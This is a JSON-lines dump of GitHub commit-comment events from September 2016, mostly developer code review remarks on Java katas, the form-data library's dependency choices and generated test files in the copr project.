{"id":"4577438201","type":"CommitCommentEvent","actor":{"login":"PierceAndy"},"repo":{"name":"nus-cs2103-AY1617S1/addressbook-level3"},"payload":{"comment":{"id":19063513,"position":8,"line":53,"path":"doc/DeveloperGuide.md","commit_id":"b93c7250babb4caef9f0830fff176a893320d9f8","created_at":"2016-09-17T06:08:40Z","updated_at":"2016-09-17T06:08:40Z","body":"In this case, the benefit is not as obvious. What's the point of tagging contacts? "}},"created_at":"2016-09-17T06:08:40Z"}
{"id":"4577439213","type":"CommitCommentEvent","actor":{"login":"sodarfish"},"repo":{"name":"sodarfish/war-revision-maven-plugin"},"payload":{"comment":{"id":19063516,"position":4,"line":135,"path":"src/main/java/com/zxcl/war_revision_maven_plugin/WarRevisionMojo.java","commit_id":"1017b2dbcc8ca2495f4fb8452822368f00fd2b6b","created_at":"2016-09-17T06:09:45Z","updated_at":"2016-09-17T06:09:45Z","body":"remove main() method"}},"created_at":"2016-09-17T06:09:45Z"}
{"id":"4577441121","type":"CommitCommentEvent","actor":{"login":"GNUpdb"},"repo":{"name":"on1arf/dstarsms"},"payload":{"comment":{"id":19063518,"position":null,"line":null,"path":null,"commit_id":"940417f1da36c72841a85d74b43190f22f265637","created_at":"2016-09-17T06:11:33Z","updated_at":"2016-09-17T06:11:33Z","body":"A good job"}},"created_at":"2016-09-17T06:11:33Z"}
{"id":"4577443107","type":"CommitCommentEvent","actor":{"login":"Writtic"},"repo":{"name":"ENOW-IJI/storm"},"payload":{"comment":{"id":19063521,"position":null,"line":null,"path":null,"commit_id":"891ffeb35277c1e9dff5337f91dc570b125d0bdf","created_at":"2016-09-17T06:13:23Z","updated_at":"2016-09-17T06:13:23Z","body":"Move _producer.send(nodeData); to out of the for statement"}},"created_at":"2016-09-17T06:13:23Z"}
{"id":"4577443681","type":"CommitCommentEvent","actor":{"login":"raveit65"},"repo":{"name":"mate-desktop/mate-common"},"payload":{"comment":{"id":19063524,"position":null,"line":null,"path":null,"commit_id":"0cbb9c88dc747d8521be9e452b21b15bfdd98196","created_at":"2016-09-17T06:13:58Z","updated_at":"2016-09-17T06:13:58Z","body":"@monsta \r\nI thought you wanted to update NEWS files :-/\r\nAs my healthy isn't 100% perfect i need a bit more time as usual to create/building/testing tarballs.\r\nDoing all on Monday is impossible, i need to start today.\r\nCan you update NEWS from your home please?\r\nMy running order after mate-common.\r\nmate-desktop\r\nlibmate.... packages\r\nmate-session-manger\r\nm-s-d\r\ncaja\r\nmarco\r\nmate-panel\r\nthan the rest.\r\n\r\nThank you"}},"created_at":"2016-09-17T06:13:58Z"}
{"id":"4577444714","type":"CommitCommentEvent","actor":{"login":"shreyasta"},"repo":{"name":"shreyasta/Java-Codecademy-projects"},"payload":{"comment":{"id":19063528,"position":null,"line":null,"path":null,"commit_id":"8cb343f92f97349d19fcfd31669a8ce6d9edf08f","created_at":"2016-09-17T06:14:59Z","updated_at":"2016-09-17T06:14:59Z","body":"Create a public class called Droid.\r\n2.\r\nCreate an int instance variable called batteryLevel. Do not set it equal to anything at the moment.\r\n3.\r\nCreate a Droid constructor. Inside of the Droid constructor, set batteryLevel equal to 100. Now every time a Droid is created, its battery level will be at 100 percent.\r\n4.\r\nNext, create a method called activate. The method should not return any data type.\r\n5.\r\nInside of activate, print out a message to the user that lets them know their Droid is activated and alive. For example: Activated. How can I help you?.\r\n6.\r\nAll Droid actions should use up some battery life. On the next line, decrease the battery level by 5 percent.\r\n\r\nHint: batteryLevel is equal to batteryLevel minus 5.\r\n7.\r\nWe should always update the user on the battery level every time the Droid performs an action. On the next line, print out the battery level.\r\n\r\nHint: System.out.println(\"Battery level is: \" + batteryLevel + \" percent.\");.\r\n8.\r\nLet's provide a way for users to charge their Droid. Create a method called chargeBattery. It should accept an int parameter called hours. The method should not return any data type.\r\n9.\r\nThe first thing the method should do is inform the user that their droid is charging. Print out Droid charging....\r\n10.\r\nNext, the battery level should increase by the number of hours specified by the user.\r\n\r\nHint: batteryLevel is equal to batteryLevel plus hours.\r\n11.\r\nWe have to make sure the user doesn't overcharge the Droid. Inside of chargeBattery, write an if statement that checks if the battery level is greater than 100.\r\n12.\r\nIf the battery level is greater than 100, set the battery level equal to 100, then print out the battery level to the user on the next line (refer to step 7 if you need help).\r\n13.\r\nOtherwise, in an else block, simply print out the value of the battery level to the user (refer to step 7 if you need help).\r\n14.\r\nNext, create a method called checkBatteryLevel. It should return an int.\r\n15.\r\nInside of the method, print out the battery level to the user.\r\n16.\r\nOn the next line, return the battery level.\r\n17.\r\nCreate another method called hover. The method should not return a value. It should accept an int parameter called feet.\r\n18.\r\nThis method will instruct the Droid to hover above the ground, but we can't let the Droid hover too far off the ground. Inside of the method, use an if statement to check if feet is greater than 2.\r\n19.\r\nInside of the if statement, print out a friendly error to the user, for example: Error! I cannot hover above 2 feet.\r\n20.\r\nOtherwise, in an else block, print out to the user Hovering.... On the next line, decrease the battery level by 20.\r\n21.\r\nOn the next line, print out the battery level to the user.\r\n22.\r\nNow create the main method.\r\n23.\r\nInside of the main method, create a Droid object.\r\n24.\r\nOn the next line, call the activate method on the object.\r\n25.\r\nNext, call the chargeBattery method and specify 5 as the hours parameter.\r\n26.\r\nFinally, call the hover method and specify a feet parameter.\r\n27.\r\nIf you completed the project correctly, the output will indicate first a battery level of 95, then 100, then 80."}},"created_at":"2016-09-17T06:14:59Z"}
{"id":"4577445366","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063531,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:15:35Z","updated_at":"2016-09-17T06:15:35Z","body":":/"}},"created_at":"2016-09-17T06:15:35Z"}
{"id":"4577445585","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/RockPaperScissors"},"payload":{"comment":{"id":19063532,"position":null,"line":null,"path":null,"commit_id":"a757561558e02bb2a27079aee760753269a516b9","created_at":"2016-09-17T06:15:46Z","updated_at":"2016-09-17T06:15:46Z","body":"While there is nothing wrong with the test; I prefer not to start with a negative test; especially when you have the entire business functionality to implement"}},"created_at":"2016-09-17T06:15:46Z"}
{"id":"4577446169","type":"CommitCommentEvent","actor":{"login":"shreyasta"},"repo":{"name":"shreyasta/Java-Codecademy-projects"},"payload":{"comment":{"id":19063536,"position":null,"line":null,"path":null,"commit_id":"d85ebe45656c39e0a52cd2c208d10590d0578a9d","created_at":"2016-09-17T06:16:19Z","updated_at":"2016-09-17T06:16:19Z","body":"Create a public class called Droid.\r\n2.\r\nCreate an int instance variable called batteryLevel. Do not set it equal to anything at the moment.\r\n3.\r\nCreate a Droid constructor. Inside of the Droid constructor, set batteryLevel equal to 100. Now every time a Droid is created, its battery level will be at 100 percent.\r\n4.\r\nNext, create a method called activate. The method should not return any data type.\r\n5.\r\nInside of activate, print out a message to the user that lets them know their Droid is activated and alive. For example: Activated. How can I help you?.\r\n6.\r\nAll Droid actions should use up some battery life. On the next line, decrease the battery level by 5 percent.\r\n\r\nHint: batteryLevel is equal to batteryLevel minus 5.\r\n7.\r\nWe should always update the user on the battery level every time the Droid performs an action. On the next line, print out the battery level.\r\n\r\nHint: System.out.println(\"Battery level is: \" + batteryLevel + \" percent.\");.\r\n8.\r\nLet's provide a way for users to charge their Droid. Create a method called chargeBattery. It should accept an int parameter called hours. The method should not return any data type.\r\n9.\r\nThe first thing the method should do is inform the user that their droid is charging. Print out Droid charging....\r\n10.\r\nNext, the battery level should increase by the number of hours specified by the user.\r\n\r\nHint: batteryLevel is equal to batteryLevel plus hours.\r\n11.\r\nWe have to make sure the user doesn't overcharge the Droid. Inside of chargeBattery, write an if statement that checks if the battery level is greater than 100.\r\n12.\r\nIf the battery level is greater than 100, set the battery level equal to 100, then print out the battery level to the user on the next line (refer to step 7 if you need help).\r\n13.\r\nOtherwise, in an else block, simply print out the value of the battery level to the user (refer to step 7 if you need help).\r\n14.\r\nNext, create a method called checkBatteryLevel. It should return an int.\r\n15.\r\nInside of the method, print out the battery level to the user.\r\n16.\r\nOn the next line, return the battery level.\r\n17.\r\nCreate another method called hover. The method should not return a value. It should accept an int parameter called feet.\r\n18.\r\nThis method will instruct the Droid to hover above the ground, but we can't let the Droid hover too far off the ground. Inside of the method, use an if statement to check if feet is greater than 2.\r\n19.\r\nInside of the if statement, print out a friendly error to the user, for example: Error! I cannot hover above 2 feet.\r\n20.\r\nOtherwise, in an else block, print out to the user Hovering.... On the next line, decrease the battery level by 20.\r\n21.\r\nOn the next line, print out the battery level to the user.\r\n22.\r\nNow create the main method.\r\n23.\r\nInside of the main method, create a Droid object.\r\n24.\r\nOn the next line, call the activate method on the object.\r\n25.\r\nNext, call the chargeBattery method and specify 5 as the hours parameter.\r\n26.\r\nFinally, call the hover method and specify a feet parameter.\r\n27.\r\nIf you completed the project correctly, the output will indicate first a battery level of 95, then 100, then 80."}},"created_at":"2016-09-17T06:16:19Z"}
{"id":"4577446542","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063537,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:16:47Z","updated_at":"2016-09-17T06:16:47Z","body":"@jdalton Are you unhappy with the PR in general or with anything specific?"}},"created_at":"2016-09-17T06:16:47Z"}
{"id":"4577447672","type":"CommitCommentEvent","actor":{"login":"linuxenko"},"repo":{"name":"linuxenko/dns.js.org"},"payload":{"comment":{"id":19063541,"position":null,"line":null,"path":null,"commit_id":"836a7c10cd7457a2429f598f302b406863913248","created_at":"2016-09-17T06:17:53Z","updated_at":"2016-09-17T06:17:53Z","body":"- There is reasonable content on the page (see: [No Content](https://github.com/js-org/dns.js.org/wiki/No-Content))\r\n- I have read and accepted the [ToS](http://dns.js.org/terms.html)"}},"created_at":"2016-09-17T06:17:53Z"}
{"id":"4577448035","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/RockPaperScissors"},"payload":{"comment":{"id":19063543,"position":11,"line":16,"path":"src/main/java/com/kataskills/App.java","commit_id":"a8d8e6165b8f60a5ef5fbc454fe860133d102918","created_at":"2016-09-17T06:18:14Z","updated_at":"2016-09-17T06:18:14Z","body":"you could / should use static imports ``Arrays.asList``"}},"created_at":"2016-09-17T06:18:14Z"}
{"id":"4577448790","type":"CommitCommentEvent","actor":{"login":"davido"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":19063547,"position":32,"line":32,"path":"src/com/facebook/buck/util/DefaultPropertyFinder.java","commit_id":"849e68a61002a878f92c6ced219d1089268950c3","created_at":"2016-09-17T06:19:01Z","updated_at":"2016-09-17T06:19:01Z","body":"I found some occurences of that constant in Buck code on most recent master, but they are all unrelated, right? In which case sorry for the noise: [1].\r\n\r\n* [1] http://paste.openstack.org/show/580398"}},"created_at":"2016-09-17T06:19:01Z"}
{"id":"4577448863","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063548,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:19:05Z","updated_at":"2016-09-17T06:19:05Z","body":"Related to https://twitter.com/mscdexdotexe/status/777025816635072512."}},"created_at":"2016-09-17T06:19:05Z"}
{"id":"4577450009","type":"CommitCommentEvent","actor":{"login":"clime"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":19063553,"position":2,"line":2,"path":"beaker-tests/Regression/backend/distgit-files/var/lib/dist-git/git/rpms/@copr/copr-dev/example.git/objects/53/677fae27782b4e970ce11e9fbf2523f7081b8d","commit_id":"a69c1789fcb1a3cf8f64650a3f6e84fcdd07fb5b","created_at":"2016-09-17T06:20:11Z","updated_at":"2016-09-17T06:20:11Z","body":"These files got generated after a commit into the repo, which was done to support new test-cases. I strongly think removing them isn't a good idea."}},"created_at":"2016-09-17T06:20:11Z"}
{"id":"4577450697","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/RockPaperScissors"},"payload":{"comment":{"id":19063556,"position":10,"line":15,"path":"src/main/java/com/kataskills/App.java","commit_id":"a8d8e6165b8f60a5ef5fbc454fe860133d102918","created_at":"2016-09-17T06:20:47Z","updated_at":"2016-09-17T06:20:47Z","body":"Dont like this big if else block. Even if you want to do val;idation how about this \r\n\r\n```\r\nif(args.length != 1) {\r\n  //throw exception\r\n}\r\n\r\n//now write your logic to generate a computer token\r\n```\r\n\r\nA small if block looks and reads better\r\n\r\n\r\n"}},"created_at":"2016-09-17T06:20:47Z"}
{"id":"4577451818","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/RockPaperScissors"},"payload":{"comment":{"id":19063560,"position":15,"line":19,"path":"src/main/java/com/kataskills/App.java","commit_id":"a8d8e6165b8f60a5ef5fbc454fe860133d102918","created_at":"2016-09-17T06:21:56Z","updated_at":"2016-09-17T06:21:56Z","body":"Enum would have been much better than string. Enums by their very nature are a finite set of values. We need to think beyond stirngs"}},"created_at":"2016-09-17T06:21:56Z"}
{"id":"4577453355","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/RockPaperScissors"},"payload":{"comment":{"id":19063563,"position":35,"line":41,"path":"src/main/java/com/kataskills/App.java","commit_id":"a8d8e6165b8f60a5ef5fbc454fe860133d102918","created_at":"2016-09-17T06:23:25Z","updated_at":"2016-09-17T06:23:25Z","body":"so I will take back my comment on strings / enums since I see you have used enums.. Why cant this block return an enum instead. Why is it returning a string ??"}},"created_at":"2016-09-17T06:23:25Z"}
{"id":"4577453859","type":"CommitCommentEvent","actor":{"login":"oferRounds"},"repo":{"name":"layerhq/Atlas-iOS"},"payload":{"comment":{"id":19063564,"position":null,"line":null,"path":null,"commit_id":"0f66a8b87c27528fb69089d6e528ee8557a4f165","created_at":"2016-09-17T06:23:51Z","updated_at":"2016-09-17T06:23:51Z","body":"This is the crash the I'm getting:\r\nhttp://crashes.to/s/60b762e1bc3 (My code base is up to date, so it includes 1-2 changes which you added on top of this. So it could be that it's not due to this change.)"}},"created_at":"2016-09-17T06:23:51Z"}
{"id":"4577454946","type":"CommitCommentEvent","actor":{"login":"dgw"},"repo":{"name":"dgw/sopel-rep"},"payload":{"comment":{"id":19063566,"position":null,"line":null,"path":null,"commit_id":"bfc55dbde4d2a16225369ee5c0dbb0d02ff6b599","created_at":"2016-09-17T06:24:53Z","updated_at":"2016-09-17T06:24:53Z","body":"GitHub please…that's not a user mention in the commit message, it's a Python decorator…"}},"created_at":"2016-09-17T06:24:53Z"}
{"id":"4577455045","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063567,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:24:58Z","updated_at":"2016-09-17T06:24:58Z","body":"I see. It was in the plans to replace async with something else for [some time](https://github.com/form-data/form-data/pull/204#issuecomment-220866595). @mscdex just helped to push it forward. As rightfully noticed in #204 – only parallel method was used out of the whole async.\r\nThen it had other issues like #175. And my personal pet peeve was https://github.com/form-data/form-data/pull/255#issuecomment-247751635"}},"created_at":"2016-09-17T06:24:58Z"}
{"id":"4577455219","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"ShreejitHSC/RockPaperScissors"},"payload":{"comment":{"id":19063568,"position":null,"line":null,"path":null,"commit_id":"a8d8e6165b8f60a5ef5fbc454fe860133d102918","created_at":"2016-09-17T06:25:09Z","updated_at":"2016-09-17T06:25:09Z","body":"Good test cases. While I dont see the incremental git commitl it does show that you have probably thought about it incrementally. However the excessive ifs and swtiches takes the shine away. "}},"created_at":"2016-09-17T06:25:09Z"}
{"id":"4577455576","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19063569,"position":44,"line":44,"path":"youtube_dl/extractor/mangomolo.py","commit_id":"7d273a387aade7665cd25eee69d94ee615d9a4b9","created_at":"2016-09-17T06:25:26Z","updated_at":"2016-09-17T06:25:26Z","body":"```mangomolo.com``` => ```mangomolo\\.com```"}},"created_at":"2016-09-17T06:25:26Z"}
{"id":"4577455734","type":"CommitCommentEvent","actor":{"login":"d3m3vilurr"},"repo":{"name":"d3m3vilurr/moonlight-common-c"},"payload":{"comment":{"id":19063571,"position":4,"line":396,"path":"src/InputStream.c","commit_id":"8322ce4d91184438b18df0cc4334fede30773496","created_at":"2016-09-17T06:25:36Z","updated_at":"2016-09-17T06:25:36Z","body":"right. i reverted that."}},"created_at":"2016-09-17T06:25:36Z"}
{"id":"4577455767","type":"CommitCommentEvent","actor":{"login":"imamchishty"},"repo":{"name":"imamchishty/exception-core"},"payload":{"comment":{"id":19063572,"position":null,"line":null,"path":null,"commit_id":"2c6b0949e57ad6412d62bd4eb00ba626a43cc54b","created_at":"2016-09-17T06:25:38Z","updated_at":"2016-09-17T06:25:38Z","body":"I'll release this to maven central and bintray."}},"created_at":"2016-09-17T06:25:38Z"}
{"id":"4577456656","type":"CommitCommentEvent","actor":{"login":"jesusrflapp"},"repo":{"name":"jesusrflapp/jesusrflapp.github.io"},"payload":{"comment":{"id":19063576,"position":null,"line":null,"path":null,"commit_id":"301c84ce2d30940893b98195ba4fbcbda58f50e7","created_at":"2016-09-17T06:26:27Z","updated_at":"2016-09-17T06:26:27Z","body":";)"}},"created_at":"2016-09-17T06:26:27Z"}
{"id":"4577460052","type":"CommitCommentEvent","actor":{"login":"oferRounds"},"repo":{"name":"layerhq/Atlas-iOS"},"payload":{"comment":{"id":19063593,"position":null,"line":null,"path":null,"commit_id":"0f66a8b87c27528fb69089d6e528ee8557a4f165","created_at":"2016-09-17T06:29:47Z","updated_at":"2016-09-17T06:29:47Z","body":"Oh, and now I see I also get the same aforementioned crash:\r\nhttp://crashes.to/s/94dec50597b"}},"created_at":"2016-09-17T06:29:47Z"}
{"id":"4577460270","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19063595,"position":null,"line":null,"path":null,"commit_id":"bd7f56a5256c33c560bb7e07c8d55c4febba0d24","created_at":"2016-09-17T06:29:58Z","updated_at":"2016-09-17T06:29:58Z","body":"Couldnt figure out how to address last one, but notated to be addressed possibly later."}},"created_at":"2016-09-17T06:29:58Z"}
{"id":"4577462090","type":"CommitCommentEvent","actor":{"login":"wangjiefeng"},"repo":{"name":"wangjiefeng/practice"},"payload":{"comment":{"id":19063599,"position":null,"line":null,"path":null,"commit_id":"4002d9e846b73af00f2839ef7b275ce227d7f903","created_at":"2016-09-17T06:31:36Z","updated_at":"2016-09-17T06:31:36Z","body":"something wrong while upload, so it was blank."}},"created_at":"2016-09-17T06:31:36Z"}
{"id":"4577462491","type":"CommitCommentEvent","actor":{"login":"KamataRyo"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":19063605,"position":null,"line":null,"path":null,"commit_id":"6cea23f411e871e69d6be00047f976f79d9d788a","created_at":"2016-09-17T06:32:05Z","updated_at":"2016-09-17T06:32:05Z","body":"I havenot tried Mac os case,  nice to put each installation cases for the document. "}},"created_at":"2016-09-17T06:32:05Z"}
{"id":"4577462518","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063606,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:32:06Z","updated_at":"2016-09-17T06:32:06Z","body":"From #255\r\n> This is especially important for dependents like request, which are heavily depended upon, so reducing the space used will have a positive effect for all.\r\n\r\nJust a heads up Lodash is depended upon [by considerably more](https://gist.github.com/anvaka/8e8fa57c7ee1350e3491#file-01-most-dependent-upon-md) so changes are Lodash is already in folks local npm cache."}},"created_at":"2016-09-17T06:32:06Z"}
{"id":"4577464221","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19063615,"position":12,"line":13,"path":"rockScissorsPaper/src/test/java/com/spark/game/RockPaperScissorsGameTest.java","commit_id":"050a7ab731f762ed188f04ff8dc71e48432eba27","created_at":"2016-09-17T06:33:46Z","updated_at":"2016-09-17T06:33:46Z","body":"you dont need this annotation. Or instead of using ``after`` using ``before``"}},"created_at":"2016-09-17T06:33:46Z"}
{"id":"4577464364","type":"CommitCommentEvent","actor":{"login":"rolfing"},"repo":{"name":"rolfing/Scrollview"},"payload":{"comment":{"id":19063616,"position":null,"line":null,"path":null,"commit_id":"b2151fb3c6ef035e19f51cd4e8f13ff9437730b5","created_at":"2016-09-17T06:33:55Z","updated_at":"2016-09-17T06:33:55Z","body":"add a scroll view to single Textview"}},"created_at":"2016-09-17T06:33:55Z"}
{"id":"4577464701","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19063618,"position":37,"line":33,"path":"rockScissorsPaper/src/test/java/com/spark/game/RockPaperScissorsGameTest.java","commit_id":"050a7ab731f762ed188f04ff8dc71e48432eba27","created_at":"2016-09-17T06:34:15Z","updated_at":"2016-09-17T06:34:15Z","body":"yeah again not technically required.. "}},"created_at":"2016-09-17T06:34:15Z"}
{"id":"4577466492","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19063629,"position":13,"line":10,"path":"rockScissorsPaper/src/main/java/com/spark/game/RockPaperScissorsGame.java","commit_id":"690810cd49fa4a8eeb5e8d97ae5a18611b89a20b","created_at":"2016-09-17T06:36:01Z","updated_at":"2016-09-17T06:36:01Z","body":"use static imports and readability will improve. ON eclipse I use ``ctrl + shift + M`` for static imports. "}},"created_at":"2016-09-17T06:36:01Z"}
{"id":"4577466904","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":19063632,"position":2,"line":2,"path":"beaker-tests/Regression/backend/distgit-files/var/lib/dist-git/git/rpms/@copr/copr-dev/example.git/objects/53/677fae27782b4e970ce11e9fbf2523f7081b8d","commit_id":"a69c1789fcb1a3cf8f64650a3f6e84fcdd07fb5b","created_at":"2016-09-17T06:36:24Z","updated_at":"2016-09-17T06:36:24Z","body":"So you claim this got generated before you've pushed that?\r\n\r\nUsually people generate the stuff dynamically during tests, or during release time into tarballs -- but never put such things into git please."}},"created_at":"2016-09-17T06:36:24Z"}
{"id":"4577466959","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063633,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:36:27Z","updated_at":"2016-09-17T06:36:27Z","body":"This wasn't issue for me. I mean size per-se, but more like amount of _unused_ code. And not even with lodash, but more with async itself – it covers all the possible scenarios and I needed only one. If async would have separate methods as packages (lodash style) – it would be the way to go."}},"created_at":"2016-09-17T06:36:27Z"}
{"id":"4577467038","type":"CommitCommentEvent","actor":{"login":"mscdex"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063636,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:36:31Z","updated_at":"2016-09-17T06:36:31Z","body":"That might not be as much of an issue for development environments, but IMHO the size is too much for other cases. 5.5MB is still 5.5MB.\r\n\r\nThat's my 2 bytes."}},"created_at":"2016-09-17T06:36:31Z"}
{"id":"4577467539","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19063637,"position":3,"line":5,"path":"rockScissorsPaper/src/main/java/com/spark/game/RockPaperScissorsGame.java","commit_id":"690810cd49fa4a8eeb5e8d97ae5a18611b89a20b","created_at":"2016-09-17T06:36:59Z","updated_at":"2016-09-17T06:36:59Z","body":"No one said that the input / output has to be a string. Yes it will be string when you are accepting inputs from a user through an interface. But if you think about this as a service layer then you can use Enums everywhere in the input types and return types"}},"created_at":"2016-09-17T06:36:59Z"}
{"id":"4577468237","type":"CommitCommentEvent","actor":{"login":"wangjiefeng"},"repo":{"name":"wangjiefeng/practice"},"payload":{"comment":{"id":19063639,"position":null,"line":null,"path":null,"commit_id":"f6dd7ab098947b059a1e52d4a47d787b4e373906","created_at":"2016-09-17T06:37:40Z","updated_at":"2016-09-17T06:37:40Z","body":"the first version, translate to postfix expression. This is a little practice, for my compiler-making plan, I have to code more raead more. At last, this vresion is really a shit beacuse it just support plus and minus."}},"created_at":"2016-09-17T06:37:40Z"}
{"id":"4577468418","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19063640,"position":null,"line":null,"path":null,"commit_id":"926349667e89e4acc2b9e98c2ca1816d45d78306","created_at":"2016-09-17T06:37:52Z","updated_at":"2016-09-17T06:37:52Z","body":"high time you brought in static imports to improve readability"}},"created_at":"2016-09-17T06:37:52Z"}
{"id":"4577468746","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"FGMEMBERS-SCENERY/EGPH-fg-CustomScenery"},"payload":{"comment":{"id":19063641,"position":null,"line":null,"path":null,"commit_id":"4a74dd5f11b58d7c8c4a2a71fb165651ca517924","created_at":"2016-09-17T06:38:11Z","updated_at":"2016-09-17T06:38:11Z","body":"![image](https://s9.postimg.org/od2azseb3/fgfs_screen_169.png)"}},"created_at":"2016-09-17T06:38:11Z"}
{"id":"4577468852","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":19063643,"position":2,"line":2,"path":"beaker-tests/Regression/backend/distgit-files/var/lib/dist-git/git/rpms/@copr/copr-dev/example.git/objects/53/677fae27782b4e970ce11e9fbf2523f7081b8d","commit_id":"a69c1789fcb1a3cf8f64650a3f6e84fcdd07fb5b","created_at":"2016-09-17T06:38:15Z","updated_at":"2016-09-17T06:38:15Z","body":":-(\r\n```\r\n$ time git clone https://github.com/fedora-copr/copr.git\r\nCloning into 'copr'...\r\nwarning: templates not found /home/praiskup/.git_templates\r\nremote: Counting objects: 27304, done.\r\nremote: Compressing objects: 100% (146/146), done.\r\nremote: Total 27304 (delta 62), reused 0 (delta 0), pack-reused 27143\r\nReceiving objects: 100% (27304/27304), 78.94 MiB | 590.00 KiB/s, done.\r\nResolving deltas: 100% (19729/19729), done.\r\nChecking connectivity... done.\r\n\r\nreal    2m30.079s\r\nuser    0m5.034s\r\nsys     0m4.119s\r\n\r\n```"}},"created_at":"2016-09-17T06:38:15Z"}
{"id":"4577470358","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"tsl0922/ttyd"},"payload":{"comment":{"id":19063651,"position":39,"line":39,"path":"utils.c","commit_id":"76a8b864156274a4da8662dec3dbcdf0919c283b","created_at":"2016-09-17T06:39:44Z","updated_at":"2016-09-17T06:39:44Z","body":"The extra check would only be needed if you are going to use an implementation of the function \"`free`\" which would not be standard-compliant.\r\nHow do you think about cooperation with configuration checks like [the macro call \"`AC_FUNC_MALLOC`\"](https://www.gnu.org/software/autoconf/manual/autoconf-2.67/html_node/Particular-Functions.html \"Checking memory management interface?\") in your build specification then?"}},"created_at":"2016-09-17T06:39:44Z"}
{"id":"4577471651","type":"CommitCommentEvent","actor":{"login":"naveenengg04"},"repo":{"name":"naveenengg04/hello-world"},"payload":{"comment":{"id":19063658,"position":null,"line":null,"path":null,"commit_id":"837a99e25a7c489256c44e9cc7b3c987ad63ff65","created_at":"2016-09-17T06:40:58Z","updated_at":"2016-09-17T06:40:58Z","body":"Whats this commit ?"}},"created_at":"2016-09-17T06:40:58Z"}
{"id":"4577473220","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19063662,"position":15,"line":17,"path":"rockScissorsPaper/src/main/java/com/spark/game/Choices.java","commit_id":"fa1f78b0244b5eb9eebc0228af9eb86d63564ab9","created_at":"2016-09-17T06:42:27Z","updated_at":"2016-09-17T06:42:27Z","body":"Very nice.. However have you heard about constructors.. Enums can have constructors and you can do the same thing..\r\n\r\n```\r\npackage first.principles.mjson;\r\n\r\npublic enum Choices {\r\n\r\n  // had to go with string constructor since it doesnt like us to use a enum before it has been\r\n  // defined\r\n  ROCK(\"SCISSORS\"), PAPER(\"ROCK\"), SCISSORS(\"PAPER\");\r\n\r\n  private Choices beats;\r\n\r\n  Choices(String beats) {\r\n    this.beats = Choices.valueOf(beats);\r\n  }\r\n}\r\n```"}},"created_at":"2016-09-17T06:42:27Z"}
{"id":"4577474067","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19063665,"position":3,"line":5,"path":"rockScissorsPaper/src/main/java/com/spark/game/Choices.java","commit_id":"fa1f78b0244b5eb9eebc0228af9eb86d63564ab9","created_at":"2016-09-17T06:43:18Z","updated_at":"2016-09-17T06:43:18Z","body":"Didnt notice this earlier.. ``DRAW`` doesnt fit in here.. It is a result and not at the same level as a rock, paper or scissors"}},"created_at":"2016-09-17T06:43:18Z"}
